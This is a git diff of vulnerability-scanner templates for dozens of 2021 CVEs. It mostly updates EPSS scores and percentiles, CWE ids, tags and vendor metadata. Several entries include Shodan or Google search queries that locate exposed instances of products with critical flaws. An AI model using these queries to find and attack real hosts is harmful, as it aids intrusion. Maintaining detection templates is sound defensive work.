+ epss-percentile: 0.64676
metadata:
max-request: 1
vendor: akkadianlabs
diff --git a/http/cves/2021/CVE-2021-31589.yaml b/http/cves/2021/CVE-2021-31589.yaml
index d27a699f00..6c6c132874 100644
--- a/http/cves/2021/CVE-2021-31589.yaml
+++ b/http/cves/2021/CVE-2021-31589.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-31589
cwe-id: CWE-79
- epss-score: 0.00215
+ epss-score: 0.00287
cpe: cpe:2.3:o:beyondtrust:appliance_base_software:*:*:*:*:*:*:*:*
+ epss-percentile: 0.64804
metadata:
max-request: 1
google-query: '"BeyondTrust" "Redistribution Prohibited"'
diff --git a/http/cves/2021/CVE-2021-31602.yaml b/http/cves/2021/CVE-2021-31602.yaml
index 1031697a8f..b66d075deb 100644
--- a/http/cves/2021/CVE-2021-31602.yaml
+++ b/http/cves/2021/CVE-2021-31602.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-287
epss-score: 0.39689
cpe: cpe:2.3:a:hitachi:vantara_pentaho:*:*:*:*:*:*:*:*
+ epss-percentile: 0.96761
metadata:
max-request: 2
shodan-query: Pentaho
diff --git a/http/cves/2021/CVE-2021-31682.yaml b/http/cves/2021/CVE-2021-31682.yaml
index c06cf64fdd..6c057f5609 100644
--- a/http/cves/2021/CVE-2021-31682.yaml
+++ b/http/cves/2021/CVE-2021-31682.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00265
cpe: cpe:2.3:a:automatedlogic:webctrl:*:*:*:*:*:*:*:*
+ epss-percentile: 0.63395
metadata:
max-request: 1
shodan-query: html:"/_common/lvl5/dologin.jsp"
diff --git a/http/cves/2021/CVE-2021-31755.yaml b/http/cves/2021/CVE-2021-31755.yaml
index fee64ec37e..5f9886eaa9 100644
--- a/http/cves/2021/CVE-2021-31755.yaml
+++ b/http/cves/2021/CVE-2021-31755.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-787
epss-score: 0.96795
cpe: cpe:2.3:o:tenda:ac11_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99535
metadata:
max-request: 1
vendor: tenda
diff --git a/http/cves/2021/CVE-2021-31805.yaml b/http/cves/2021/CVE-2021-31805.yaml
index ea27db2778..7f6c01f134 100644
--- a/http/cves/2021/CVE-2021-31805.yaml
+++ b/http/cves/2021/CVE-2021-31805.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-31805
cwe-id: CWE-917
- epss-score: 0.02
+ epss-score: 0.03276
cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:*
+ epss-percentile: 0.90017
metadata:
max-request: 1
vendor: apache
diff --git a/http/cves/2021/CVE-2021-31856.yaml b/http/cves/2021/CVE-2021-31856.yaml
index f4cfc0ffb0..d58474bf46 100644
--- a/http/cves/2021/CVE-2021-31856.yaml
+++ b/http/cves/2021/CVE-2021-31856.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-89
epss-score: 0.05376
cpe: cpe:2.3:a:layer5:meshery:0.5.2:*:*:*:*:*:*:*
+ epss-percentile: 0.92134
metadata:
max-request: 1
vendor: layer5
diff --git a/http/cves/2021/CVE-2021-31862.yaml b/http/cves/2021/CVE-2021-31862.yaml
index eb9ae6141e..609e5ef4dc 100644
--- a/http/cves/2021/CVE-2021-31862.yaml
+++ b/http/cves/2021/CVE-2021-31862.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-31862
cwe-id: CWE-79
- epss-score: 0.00145
+ epss-score: 0.00141
cpe: cpe:2.3:a:sysaid:sysaid:20.4.74:*:*:*:*:*:*:*
+ epss-percentile: 0.49175
metadata:
max-request: 1
vendor: sysaid
diff --git a/http/cves/2021/CVE-2021-32030.yaml b/http/cves/2021/CVE-2021-32030.yaml
index c911d7c7ac..d31c4af2a7 100644
--- a/http/cves/2021/CVE-2021-32030.yaml
+++ b/http/cves/2021/CVE-2021-32030.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-32030
cwe-id: CWE-287
- epss-score: 0.68002
+ epss-score: 0.66309
cpe: cpe:2.3:o:asus:gt-ac2900_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.97479
metadata:
max-request: 1
vendor: asus
diff --git a/http/cves/2021/CVE-2021-32172.yaml b/http/cves/2021/CVE-2021-32172.yaml
index 58a40f044a..403fb125d3 100644
--- a/http/cves/2021/CVE-2021-32172.yaml
+++ b/http/cves/2021/CVE-2021-32172.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-32172
cwe-id: CWE-862
- epss-score: 0.13569
+ epss-score: 0.20372
cpe: cpe:2.3:a:maianscriptworld:maian_cart:3.8:*:*:*:*:*:*:*
+ epss-percentile: 0.95712
metadata:
max-request: 3
vendor: maianscriptworld
diff --git a/http/cves/2021/CVE-2021-3223.yaml b/http/cves/2021/CVE-2021-3223.yaml
index a499694f6e..c9ec7fc560 100644
--- a/http/cves/2021/CVE-2021-3223.yaml
+++ b/http/cves/2021/CVE-2021-3223.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.15641
cpe: cpe:2.3:a:nodered:node-red-dashboard:*:*:*:*:*:node.js:*:*
+ epss-percentile: 0.95204
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2021/CVE-2021-32305.yaml b/http/cves/2021/CVE-2021-32305.yaml
index 237ca45da4..8fccd19266 100644
--- a/http/cves/2021/CVE-2021-32305.yaml
+++ b/http/cves/2021/CVE-2021-32305.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-32305
cwe-id: CWE-78
- epss-score: 0.97295
+ epss-score: 0.96929
cpe: cpe:2.3:a:websvn:websvn:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99602
metadata:
max-request: 1
vendor: websvn
diff --git a/http/cves/2021/CVE-2021-32618.yaml b/http/cves/2021/CVE-2021-32618.yaml
index f1ff630626..99aa21b7bb 100644
--- a/http/cves/2021/CVE-2021-32618.yaml
+++ b/http/cves/2021/CVE-2021-32618.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-601
epss-score: 0.00104
cpe: cpe:2.3:a:flask-security_project:flask-security:*:*:*:*:*:*:*:*
+ epss-percentile: 0.41813
metadata:
max-request: 1
vendor: flask-security_project
diff --git a/http/cves/2021/CVE-2021-32682.yaml b/http/cves/2021/CVE-2021-32682.yaml
index aaae3da036..b264baa3cb 100644
--- a/http/cves/2021/CVE-2021-32682.yaml
+++ b/http/cves/2021/CVE-2021-32682.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-32682
cwe-id: CWE-22
- epss-score: 0.96875
+ epss-score: 0.96678
cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99486
metadata:
max-request: 9
github: https://github.com/Studio-42/elFinder
diff --git a/http/cves/2021/CVE-2021-32789.yaml b/http/cves/2021/CVE-2021-32789.yaml
index dedf43242f..f53d1a947f 100644
--- a/http/cves/2021/CVE-2021-32789.yaml
+++ b/http/cves/2021/CVE-2021-32789.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2021-32789
cwe-id: CWE-89
- epss-score: 0.10789
+ epss-score: 0.0942
cpe: cpe:2.3:a:automattic:woocommerce_blocks:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.93944
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-32819.yaml b/http/cves/2021/CVE-2021-32819.yaml
index 76aad330f6..f83dc63d6d 100644
--- a/http/cves/2021/CVE-2021-32819.yaml
+++ b/http/cves/2021/CVE-2021-32819.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2021-32819
cwe-id: CWE-200,NVD-CWE-noinfo
- epss-score: 0.89034
+ epss-score: 0.886
cpe: cpe:2.3:a:squirrelly:squirrelly:8.0.8:*:*:*:*:*:*:*
+ epss-percentile: 0.98273
metadata:
max-request: 1
vendor: squirrelly
diff --git a/http/cves/2021/CVE-2021-32820.yaml b/http/cves/2021/CVE-2021-32820.yaml
index 28552bf384..9b91b033e2 100644
--- a/http/cves/2021/CVE-2021-32820.yaml
+++ b/http/cves/2021/CVE-2021-32820.yaml
@@ -15,9 +15,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2021-32820
- cwe-id: CWE-94,CWE-200
+ cwe-id: CWE-200,CWE-94
epss-score: 0.00929
cpe: cpe:2.3:a:express_handlebars_project:express_handlebars:*:*:*:*:*:node.js:*:*
+ epss-percentile: 0.80999
metadata:
max-request: 1
framework: node.js
diff --git a/http/cves/2021/CVE-2021-32853.yaml b/http/cves/2021/CVE-2021-32853.yaml
index 62938be4ac..d089707d39 100644
--- a/http/cves/2021/CVE-2021-32853.yaml
+++ b/http/cves/2021/CVE-2021-32853.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.6
cve-id: CVE-2021-32853
cwe-id: CWE-79
- epss-score: 0.0066
+ epss-score: 0.0045
cpe: cpe:2.3:a:erxes:erxes:*:*:*:*:*:*:*:*
+ epss-percentile: 0.71943
metadata:
max-request: 1
shodan-query: http.title:"erxes"
diff --git a/http/cves/2021/CVE-2021-3293.yaml b/http/cves/2021/CVE-2021-3293.yaml
index c4680c512b..ff0d4ff44c 100644
--- a/http/cves/2021/CVE-2021-3293.yaml
+++ b/http/cves/2021/CVE-2021-3293.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00226
cpe: cpe:2.3:a:emlog:emlog:5.3.1:*:*:*:*:*:*:*
+ epss-percentile: 0.60142
metadata:
max-request: 1
vendor: emlog
diff --git a/http/cves/2021/CVE-2021-3297.yaml b/http/cves/2021/CVE-2021-3297.yaml
index 1a98f4451e..6dfaa8a293 100644
--- a/http/cves/2021/CVE-2021-3297.yaml
+++ b/http/cves/2021/CVE-2021-3297.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-287
epss-score: 0.18886
cpe: cpe:2.3:o:zyxel:nbg2105_firmware:v1.00\(aagu.2\)c0:*:*:*:*:*:*:*
+ epss-percentile: 0.95572
metadata:
max-request: 1
vendor: zyxel
diff --git a/http/cves/2021/CVE-2021-33044.yaml b/http/cves/2021/CVE-2021-33044.yaml
index 520a89d8cb..06607abbdd 100644
--- a/http/cves/2021/CVE-2021-33044.yaml
+++ b/http/cves/2021/CVE-2021-33044.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-33044
cwe-id: CWE-287
- epss-score: 0.12129
+ epss-score: 0.10344
cpe: cpe:2.3:o:dahuasecurity:ipc-hum7xxx_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.94217
metadata:
max-request: 1
vendor: dahuasecurity
diff --git a/http/cves/2021/CVE-2021-33221.yaml b/http/cves/2021/CVE-2021-33221.yaml
index a9b055684f..07ad1480f1 100644
--- a/http/cves/2021/CVE-2021-33221.yaml
+++ b/http/cves/2021/CVE-2021-33221.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-306
epss-score: 0.24628
cpe: cpe:2.3:a:commscope:ruckus_iot_controller:*:*:*:*:*:*:*:*
+ epss-percentile: 0.96022
metadata:
max-request: 1
vendor: commscope
diff --git a/http/cves/2021/CVE-2021-33357.yaml b/http/cves/2021/CVE-2021-33357.yaml
index e0abd235dc..140abdc762 100644
--- a/http/cves/2021/CVE-2021-33357.yaml
+++ b/http/cves/2021/CVE-2021-33357.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-33357
cwe-id: CWE-78
- epss-score: 0.96446
+ epss-score: 0.96752
cpe: cpe:2.3:a:raspap:raspap:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99515
metadata:
max-request: 1
vendor: raspap
diff --git a/http/cves/2021/CVE-2021-33544.yaml b/http/cves/2021/CVE-2021-33544.yaml
index 20a4f3de11..2298b4e4f7 100644
--- a/http/cves/2021/CVE-2021-33544.yaml
+++ b/http/cves/2021/CVE-2021-33544.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.2
cve-id: CVE-2021-33544
cwe-id: CWE-78
- epss-score: 0.97539
+ epss-score: 0.97529
cpe: cpe:2.3:o:geutebrueck:g-cam_ebc-2110_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99982
metadata:
max-request: 1
vendor: geutebrueck
diff --git a/http/cves/2021/CVE-2021-33564.yaml b/http/cves/2021/CVE-2021-33564.yaml
index ce74e25f95..ee6289f866 100644
--- a/http/cves/2021/CVE-2021-33564.yaml
+++ b/http/cves/2021/CVE-2021-33564.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-33564
cwe-id: CWE-88
- epss-score: 0.07974
+ epss-score: 0.07998
cpe: cpe:2.3:a:dragonfly_project:dragonfly:*:*:*:*:*:ruby:*:*
+ epss-percentile: 0.9344
metadata:
max-request: 2
framework: ruby
diff --git a/http/cves/2021/CVE-2021-3374.yaml b/http/cves/2021/CVE-2021-3374.yaml
index f0e514be8e..4034cb40ab 100644
--- a/http/cves/2021/CVE-2021-3374.yaml
+++ b/http/cves/2021/CVE-2021-3374.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00195
cpe: cpe:2.3:a:rstudio:shiny_server:*:*:*:*:pro:*:*:*
+ epss-percentile: 0.5653
metadata:
max-request: 2
vendor: rstudio
diff --git a/http/cves/2021/CVE-2021-3377.yaml b/http/cves/2021/CVE-2021-3377.yaml
index c993c1bdb6..8c3e81057f 100644
--- a/http/cves/2021/CVE-2021-3377.yaml
+++ b/http/cves/2021/CVE-2021-3377.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00116
cpe: cpe:2.3:a:ansi_up_project:ansi_up:*:*:*:*:*:node.js:*:*
+ epss-percentile: 0.44596
metadata:
max-request: 1
framework: node.js
diff --git a/http/cves/2021/CVE-2021-3378.yaml b/http/cves/2021/CVE-2021-3378.yaml
index aedb184a50..7b33c9d1d0 100644
--- a/http/cves/2021/CVE-2021-3378.yaml
+++ b/http/cves/2021/CVE-2021-3378.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-3378
cwe-id: CWE-434
- epss-score: 0.18588
+ epss-score: 0.18908
cpe: cpe:2.3:a:fortilogger:fortilogger:*:*:*:*:*:*:*:*
+ epss-percentile: 0.95576
metadata:
max-request: 2
vendor: fortilogger
diff --git a/http/cves/2021/CVE-2021-33807.yaml b/http/cves/2021/CVE-2021-33807.yaml
index da3a4c6693..9f42411e15 100644
--- a/http/cves/2021/CVE-2021-33807.yaml
+++ b/http/cves/2021/CVE-2021-33807.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2021-33807
cwe-id: CWE-22
- epss-score: 0.03105
+ epss-score: 0.02433
cpe: cpe:2.3:a:gespage:gespage:*:*:*:*:*:*:*:*
+ epss-percentile: 0.88585
metadata:
max-request: 1
vendor: gespage
diff --git a/http/cves/2021/CVE-2021-33851.yaml b/http/cves/2021/CVE-2021-33851.yaml
index d36785e164..908be88e38 100644
--- a/http/cves/2021/CVE-2021-33851.yaml
+++ b/http/cves/2021/CVE-2021-33851.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00092
cpe: cpe:2.3:a:apasionados:customize_login_image:3.4:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.3834
metadata:
max-request: 4
verified: true
diff --git a/http/cves/2021/CVE-2021-33904.yaml b/http/cves/2021/CVE-2021-33904.yaml
index 8fc4ee4f06..fca48061b4 100644
--- a/http/cves/2021/CVE-2021-33904.yaml
+++ b/http/cves/2021/CVE-2021-33904.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00152
cpe: cpe:2.3:a:accela:civic_platform:*:*:*:*:*:*:*:*
+ epss-percentile: 0.5076
metadata:
max-request: 1
vendor: accela
diff --git a/http/cves/2021/CVE-2021-34370.yaml b/http/cves/2021/CVE-2021-34370.yaml
index fb588ce973..7bba239ebc 100644
--- a/http/cves/2021/CVE-2021-34370.yaml
+++ b/http/cves/2021/CVE-2021-34370.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00183
cpe: cpe:2.3:a:accela:civic_platform:*:*:*:*:*:*:*:*
+ epss-percentile: 0.54871
metadata:
max-request: 1
vendor: accela
diff --git a/http/cves/2021/CVE-2021-34429.yaml b/http/cves/2021/CVE-2021-34429.yaml
index 3eac460423..c3f2239732 100644
--- a/http/cves/2021/CVE-2021-34429.yaml
+++ b/http/cves/2021/CVE-2021-34429.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 5.3
cve-id: CVE-2021-34429
cwe-id: CWE-200
- epss-score: 0.82695
+ epss-score: 0.79921
cpe: cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*
+ epss-percentile: 0.97877
metadata:
max-request: 2
vendor: eclipse
diff --git a/http/cves/2021/CVE-2021-34473.yaml b/http/cves/2021/CVE-2021-34473.yaml
index b503e4fcc4..74161e0185 100644
--- a/http/cves/2021/CVE-2021-34473.yaml
+++ b/http/cves/2021/CVE-2021-34473.yaml
@@ -18,8 +18,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-34473
cwe-id: CWE-918
- epss-score: 0.97442
+ epss-score: 0.97443
cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*
+ epss-percentile: 0.99916
metadata:
max-request: 2
vendor: microsoft
diff --git a/http/cves/2021/CVE-2021-34621.yaml b/http/cves/2021/CVE-2021-34621.yaml
index 0a08c91be5..0c60b8728d 100644
--- a/http/cves/2021/CVE-2021-34621.yaml
+++ b/http/cves/2021/CVE-2021-34621.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-306,CWE-269
epss-score: 0.79769
cpe: cpe:2.3:a:properfraction:profilepress:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.97869
metadata:
max-request: 3
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-34640.yaml b/http/cves/2021/CVE-2021-34640.yaml
index 0f3056f195..994841813e 100644
--- a/http/cves/2021/CVE-2021-34640.yaml
+++ b/http/cves/2021/CVE-2021-34640.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00116
cpe: cpe:2.3:a:securimage-wp-fixed_project:securimage-wp-fixed:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.44609
metadata:
max-request: 2
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-34643.yaml b/http/cves/2021/CVE-2021-34643.yaml
index b9220c2a42..d6e66e046a 100644
--- a/http/cves/2021/CVE-2021-34643.yaml
+++ b/http/cves/2021/CVE-2021-34643.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00116
cpe: cpe:2.3:a:skaut-bazar_project:skaut-bazar:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.44609
metadata:
max-request: 2
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-34805.yaml b/http/cves/2021/CVE-2021-34805.yaml
index 8aca78f9ef..c7b8f385d1 100644
--- a/http/cves/2021/CVE-2021-34805.yaml
+++ b/http/cves/2021/CVE-2021-34805.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2021-34805
cwe-id: CWE-22
- epss-score: 0.02368
+ epss-score: 0.01996
cpe: cpe:2.3:a:land-software:faust_iserver:*:*:*:*:*:*:*:*
+ epss-percentile: 0.87368
metadata:
max-request: 1
vendor: land-software
diff --git a/http/cves/2021/CVE-2021-35250.yaml b/http/cves/2021/CVE-2021-35250.yaml
index 4c2109906e..2e287ef617 100644
--- a/http/cves/2021/CVE-2021-35250.yaml
+++ b/http/cves/2021/CVE-2021-35250.yaml
@@ -17,9 +17,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-35250
- cwe-id: CWE-22,CWE-538
- epss-score: 0.04209
+ cwe-id: CWE-22
+ epss-score: 0.04866
cpe: cpe:2.3:a:solarwinds:serv-u:15.3:-:*:*:*:*:*:*
+ epss-percentile: 0.91736
metadata:
max-request: 1
shodan-query: product:"Rhinosoft Serv-U httpd"
diff --git a/http/cves/2021/CVE-2021-35265.yaml b/http/cves/2021/CVE-2021-35265.yaml
index d124ab6725..c944fb215e 100644
--- a/http/cves/2021/CVE-2021-35265.yaml
+++ b/http/cves/2021/CVE-2021-35265.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00127
cpe: cpe:2.3:a:maxsite:maxsite_cms:*:*:*:*:*:*:*:*
+ epss-percentile: 0.46567
metadata:
max-request: 2
shodan-query: html:'content="MaxSite CMS'
@@ -52,4 +53,4 @@ http:
- type: status
status:
- - 200
\ No newline at end of file
+ - 200
diff --git a/http/cves/2021/CVE-2021-35336.yaml b/http/cves/2021/CVE-2021-35336.yaml
index 2e14d1b6ed..be0104ede0 100644
--- a/http/cves/2021/CVE-2021-35336.yaml
+++ b/http/cves/2021/CVE-2021-35336.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-1188
epss-score: 0.08033
cpe: cpe:2.3:o:tieline:ip_audtio_gateway_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.93455
metadata:
max-request: 1
vendor: tieline
diff --git a/http/cves/2021/CVE-2021-35380.yaml b/http/cves/2021/CVE-2021-35380.yaml
index d4f5c726da..10b5ccbe00 100644
--- a/http/cves/2021/CVE-2021-35380.yaml
+++ b/http/cves/2021/CVE-2021-35380.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2021-35380
cwe-id: CWE-22
- epss-score: 0.10594
+ epss-score: 0.16223
cpe: cpe:2.3:a:solari:termtalk_server:3.24.0.2:*:*:*:*:*:*:*
+ epss-percentile: 0.95287
metadata:
max-request: 1
vendor: solari
diff --git a/http/cves/2021/CVE-2021-35464.yaml b/http/cves/2021/CVE-2021-35464.yaml
index 6131f3cd93..43a1ce6e87 100644
--- a/http/cves/2021/CVE-2021-35464.yaml
+++ b/http/cves/2021/CVE-2021-35464.yaml
@@ -20,14 +20,15 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-35464
cwe-id: CWE-502
- epss-score: 0.97409
+ epss-score: 0.97364
cpe: cpe:2.3:a:forgerock:am:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99844
metadata:
max-request: 1
shodan-query: http.title:"OpenAM"
vendor: forgerock
product: am
- tags: cve,cve2021,openam,rce,java,kev,kev,packetstorm
+ tags: packetstorm,cve,cve2021,openam,rce,java,kev
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-35488.yaml b/http/cves/2021/CVE-2021-35488.yaml
index b5395b6544..60d9fc7cb3 100644
--- a/http/cves/2021/CVE-2021-35488.yaml
+++ b/http/cves/2021/CVE-2021-35488.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00145
cpe: cpe:2.3:a:thruk:thruk:2.40-2:*:*:*:*:*:*:*
+ epss-percentile: 0.49646
metadata:
max-request: 1
shodan-query: http.html:"Thruk"
diff --git a/http/cves/2021/CVE-2021-35587.yaml b/http/cves/2021/CVE-2021-35587.yaml
index 70adc3a2f7..481c104598 100644
--- a/http/cves/2021/CVE-2021-35587.yaml
+++ b/http/cves/2021/CVE-2021-35587.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-35587
cwe-id: CWE-502
- epss-score: 0.96928
+ epss-score: 0.96868
cpe: cpe:2.3:a:oracle:access_manager:11.1.2.3.0:*:*:*:*:*:*:*
+ epss-percentile: 0.99568
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2021/CVE-2021-3577.yaml b/http/cves/2021/CVE-2021-3577.yaml
index db4a440feb..ddee7b8022 100644
--- a/http/cves/2021/CVE-2021-3577.yaml
+++ b/http/cves/2021/CVE-2021-3577.yaml
@@ -13,9 +13,10 @@ info:
cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2021-3577
- cwe-id: CWE-78,CWE-863
+ cwe-id: CWE-863,CWE-78
epss-score: 0.97158
cpe: cpe:2.3:o:binatoneglobal:halo\+_camera_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99701
metadata:
max-request: 1
vendor: binatoneglobal
diff --git a/http/cves/2021/CVE-2021-36260.yaml b/http/cves/2021/CVE-2021-36260.yaml
index 960c6590f3..e1fdec2474 100644
--- a/http/cves/2021/CVE-2021-36260.yaml
+++ b/http/cves/2021/CVE-2021-36260.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-36260
cwe-id: CWE-78
- epss-score: 0.97512
+ epss-score: 0.97514
cpe: cpe:2.3:o:hikvision:ds-2cd2026g2-iu\/sl_firmware:-:*:*:*:*:*:*:*
+ epss-percentile: 0.99972
metadata:
max-request: 2
shodan-query: http.favicon.hash:999357577
@@ -38,6 +39,7 @@ http:
Host: {{Hostname}}
req-condition: true
+
matchers-condition: and
matchers:
- type: regex
diff --git a/http/cves/2021/CVE-2021-36356.yaml b/http/cves/2021/CVE-2021-36356.yaml
index 2357a135dc..e294b7877e 100644
--- a/http/cves/2021/CVE-2021-36356.yaml
+++ b/http/cves/2021/CVE-2021-36356.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-36356
cwe-id: CWE-434
- epss-score: 0.93231
+ epss-score: 0.92269
cpe: cpe:2.3:a:kramerav:viaware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.98579
metadata:
max-request: 2
vendor: kramerav
diff --git a/http/cves/2021/CVE-2021-36380.yaml b/http/cves/2021/CVE-2021-36380.yaml
index b52070e15a..fbb672303c 100644
--- a/http/cves/2021/CVE-2021-36380.yaml
+++ b/http/cves/2021/CVE-2021-36380.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-36380
cwe-id: CWE-78
- epss-score: 0.97044
+ epss-score: 0.96993
cpe: cpe:2.3:a:sunhillo:sureline:*:*:*:*:*:*:*:*
+ epss-percentile: 0.9962
metadata:
max-request: 1
vendor: sunhillo
diff --git a/http/cves/2021/CVE-2021-36450.yaml b/http/cves/2021/CVE-2021-36450.yaml
index a83fb4aeac..d7d706c130 100644
--- a/http/cves/2021/CVE-2021-36450.yaml
+++ b/http/cves/2021/CVE-2021-36450.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00468
cpe: cpe:2.3:a:verint:workforce_optimization:15.2.8.10048:*:*:*:*:*:*:*
+ epss-percentile: 0.72463
metadata:
max-request: 2
shodan-query: title:"Verint Sign-in"
diff --git a/http/cves/2021/CVE-2021-3654.yaml b/http/cves/2021/CVE-2021-3654.yaml
index abe4609ae7..cee60b719b 100644
--- a/http/cves/2021/CVE-2021-3654.yaml
+++ b/http/cves/2021/CVE-2021-3654.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-3654
cwe-id: CWE-601
- epss-score: 0.93434
+ epss-score: 0.93152
cpe: cpe:2.3:a:openstack:nova:*:*:*:*:*:*:*:*
+ epss-percentile: 0.98686
metadata:
max-request: 1
vendor: openstack
diff --git a/http/cves/2021/CVE-2021-36580.yaml b/http/cves/2021/CVE-2021-36580.yaml
index bec6ff3a95..b9444c8df1 100644
--- a/http/cves/2021/CVE-2021-36580.yaml
+++ b/http/cves/2021/CVE-2021-36580.yaml
@@ -3,21 +3,28 @@ id: CVE-2021-36580
info:
name: IceWarp Mail Server - Open Redirect
author: DhiyaneshDk
+ severity: medium
description: |
IceWarp Mail Server contains an open redirect via the referer parameter. This can lead to phishing attacks or other unintended redirects.
- severity: medium
reference:
- https://www.icewarp.com/
- https://twitter.com/shifacyclewala/status/1443298941311668227
+ - http://icewarp.com
+ - http://mail.ziyan.com
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
- cwe-id: CWE-601
cve-id: CVE-2021-36580
+ cwe-id: CWE-601
+ epss-score: 0.00212
+ cpe: cpe:2.3:a:icewarp:icewarp_server:*:*:*:*:*:*:*:*
+ epss-percentile: 0.58419
metadata:
max-request: 1
verified: true
shodan-query: title:"icewarp"
+ vendor: icewarp
+ product: icewarp_server
tags: cve,cve2021,icewarp,redirect
http:
diff --git a/http/cves/2021/CVE-2021-36748.yaml b/http/cves/2021/CVE-2021-36748.yaml
index 004bb8f2d6..f80440e573 100644
--- a/http/cves/2021/CVE-2021-36748.yaml
+++ b/http/cves/2021/CVE-2021-36748.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-89
epss-score: 0.00805
cpe: cpe:2.3:a:prestahome:blog:*:*:*:*:*:prestashop:*:*
+ epss-percentile: 0.79534
metadata:
max-request: 2
framework: prestashop
diff --git a/http/cves/2021/CVE-2021-36749.yaml b/http/cves/2021/CVE-2021-36749.yaml
index 55fb61b401..bd19cbd423 100644
--- a/http/cves/2021/CVE-2021-36749.yaml
+++ b/http/cves/2021/CVE-2021-36749.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.5
